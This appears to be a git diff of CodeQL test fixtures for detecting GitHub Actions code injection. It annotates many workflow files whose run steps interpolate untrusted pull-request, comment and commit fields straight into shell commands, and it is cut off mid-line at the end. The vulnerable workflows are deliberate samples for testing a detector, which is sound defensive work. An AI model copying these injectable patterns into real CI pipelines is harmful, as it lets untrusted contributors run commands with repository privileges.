Alert[actions/code-injection/critical] let response; if (commentBody.includes("hello")) { response = "Hello! How can I help you today?"; diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml index 826051dfc5ac..bd378f614064 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml @@ -34,4 +34,4 @@ jobs: pr-message: 'Message that will be displayed on users first pr' - name: Log test executions run: | - echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml index 560e69f9e4b0..3ab37e1e4dba 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml @@ -11,4 +11,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.body }}" + - run: echo "${{ github.event.pull_request.body }}" # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml index d4ce78856694..01af6deeaf20 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml @@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' - - run: echo '${{ github.event.pull_request.body }}' - - run: echo '${{ github.event.pull_request.head.label }}' - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' - - run: echo '${{ github.event.pull_request.head.repo.description }}' - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - - run: echo '${{ github.event.pull_request.head.ref }}' - - run: echo '${{ github.event.review.body }}' + - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.review.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml index 5d288caad85d..1b08e4a18550 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml @@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' - - run: echo '${{ github.event.pull_request.body }}' - - run: echo '${{ github.event.pull_request.head.label }}' - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' - - run: echo '${{ github.event.pull_request.head.repo.description }}' - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - - run: echo '${{ github.event.pull_request.head.ref }}' - - run: echo '${{ github.event.comment.body }}' + - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 4ca3753f50cd..da99a837568e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -6,12 +6,12 @@ jobs: steps: - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it - - run: echo '${{ github.event.pull_request.title }}' - - run: echo '${{ github.event.pull_request.body }}' - - run: echo '${{ github.event.pull_request.head.label }}' - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' - - run: echo '${{ github.event.pull_request.head.repo.description }}' - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - - run: echo '${{ github.event.pull_request.head.ref }}' - - run: echo '${{ github.head_ref }}' + - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.head_ref }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml index 2006a7999daf..97dfeb05c81b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml @@ -4,13 +4,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' - - run: echo '${{ github.event.commits[11].author.email }}' - - run: echo '${{ github.event.commits[11].author.name }}' - - run: echo '${{ github.event.head_commit.message }}' - - run: echo '${{ github.event.head_commit.author.email }}' - - run: echo '${{ github.event.head_commit.author.name }}' - - run: echo '${{ github.event.head_commit.committer.email }}' - - run: echo '${{ github.event.head_commit.committer.name }}' - - run: echo '${{ github.event.commits[11].committer.email }}' - - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml index 8b7a6df009c2..f459b9b51499 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml @@ -6,13 +6,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' - - run: echo '${{ github.event.commits[11].author.email }}' - - run: echo '${{ github.event.commits[11].author.name }}' - - run: echo '${{ github.event.head_commit.message }}' - - run: echo '${{ github.event.head_commit.author.email }}' - - run: echo '${{ github.event.head_commit.author.name }}' - - run: echo '${{ github.event.head_commit.committer.email }}' - - run: echo '${{ github.event.head_commit.committer.name }}' - - run: echo '${{ github.event.commits[11].committer.email }}' - - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml index 0c4aa93c7a58..34c2f156a099 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" + - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/medium] - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; + const log = '${{ env.log }}'; # $ Alert[actions/code-injection/medium] let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; + const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/medium] const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml index 0c4aa93c7a58..333af0376ca0 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" + - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; + const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; + const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml index a237856b6ce7..3ef3f09bf563 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -8,4 +8,4 @@ jobs: permissions: {} uses: ./.github/workflows/reusable-workflow-1.yml with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml index 0f87d1e9394f..e4c6ec031442 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -7,4 +7,4 @@ jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml index 39dfafcf023e..4ef27dca557e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -7,4 +7,4 @@ jobs: test: uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index 5390612f105d..087b116464e5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,8 +13,8 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['comment']['body'] }} + source: ${{ github.event['comment']['body'] }} # $ Source[actions/code-injection/critical] find: 'foo' replace: '' - - run: ${{ steps.source.outputs.value }} - - run: ${{ needs.test1.outputs.job_output }} + - run: ${{ steps.source.outputs.value }} # $ Alert[actions/code-injection/critical] + - run: ${{ needs.test1.outputs.job_output }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml index 94e8be89bdc6..78f5c845d04d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml @@ -8,12 +8,12 @@ jobs: - id: summary uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} + source: ${{ github.event.head_commit.message }} # $ Source[actions/code-injection/medium] find: 'foo' replace: '' - id: flow run: | - echo "${{steps.summary.outputs.value}}" + echo "${{steps.summary.outputs.value}}" # $ Alert[actions/code-injection/medium] - id: no-flow run: | echo "${{steps.summary.outputs.foo}}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml index 8271f93d857f..d1c7dedaa10e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml @@ -15,7 +15,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/critical] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -26,7 +26,7 @@ jobs: - name: List all changed files id: sink run: | - for file in ${{ steps.step.outputs.value }}; do + for file in ${{ steps.step.outputs.value }}; do # $ Alert[actions/code-injection/critical] echo "$file was changed" done diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index 3128aacc93ce..e08ab1a84556 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -17,7 +17,7 @@ jobs: steps: - name: Echo trigger run: | - echo "head branch: ${{ github.event.workflow_run.head_branch }}" + echo "head branch: ${{ github.event.workflow_run.head_branch }}" # $ Alert[actions/code-injection/critical] cat << EOF - ${{ toJSON(github.event) }} + ${{ toJSON(github.event) }} # $ Alert[actions/code-injection/critical] EOF diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml index 5422ac4e9876..1eb2797e31bc 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -17,5 +17,5 @@ jobs: repo-token: ${{ env.GH_TOKEN }} permission-level: read - - run: echo "${{ steps.command.outputs.command-arguments }}" + - run: echo "${{ steps.command.outputs.command-arguments }}" # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 5aeb9aac7c52..6d29df909559 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -17,7 +17,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['pull_request']['body'] }} + source: ${{ github.event['pull_request']['body'] }} # $ Source[actions/code-injection/critical] find: 'foo' replace: '' - id: step1 @@ -49,4 +49,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs['job_output']}} + - run: echo ${{needs.job1.outputs['job_output']}} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index d149df2bd7ca..b58a9cb0aa26 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -20,10 +20,10 @@ jobs: - name: Extract Jira Key env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink - run: echo ${{ env.ISSUE_KEY }} + run: echo ${{ env.ISSUE_KEY }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml index 2e734076cb71..9cbfa20a6a27 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml @@ -54,7 +54,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -144,7 +144,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -237,7 +237,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -330,7 +330,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -420,7 +420,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -515,7 +515,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml index dc101c769449..151ae685df87 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -27,7 +27,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number + - name: Try to read PR number # $ Source[actions/code-injection/critical] id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -51,6 +51,6 @@ jobs: actions: read statuses: write steps: - - run: echo ${{ needs.get-artifacts.outputs.pr_num }} - - run: echo ${{ needs.get-artifacts.outputs.ref }} + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ needs.get-artifacts.outputs.ref }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml index f81bef89568f..e141ea55a115 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -7,7 +7,7 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.title || "foo" }}" + - run: echo "${{ github.event.pull_request.title || "foo" }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml index 1e5c7eec177d..876141d0e17c 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml @@ -7,8 +7,8 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.changes.body.from }}" - - run: echo "${{ github.event.changes.title.from }}" - - run: echo "${{ github.event.changes.head.ref.from }}" - - run: echo "${{ toJson(github.event.changes) }}" + - run: echo "${{ github.event.changes.body.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.title.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.head.ref.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ toJson(github.event.changes) }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml index 6d925a82d372..df3dd6e8a11a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml @@ -12,8 +12,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.changed-files.outputs.files }}" + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] test2: runs-on: ubuntu-latest steps: @@ -23,8 +23,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "files=${FILES}" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.changed-files.outputs.files }}" + echo "files=${FILES}" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] test3: runs-on: ubuntu-latest steps: @@ -33,8 +33,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" - - run: echo "${{ env.CHANGED-FILES }}" + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] test4: runs-on: ubuntu-latest steps: @@ -44,8 +44,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" - - run: echo "${{ env.CHANGED-FILES }}" + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml index a39967760e8e..bc06e8a525d8 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml @@ -9,30 +9,30 @@ jobs: steps: - id: title run: | - echo "title=$(jq --raw-output .pull_request.title 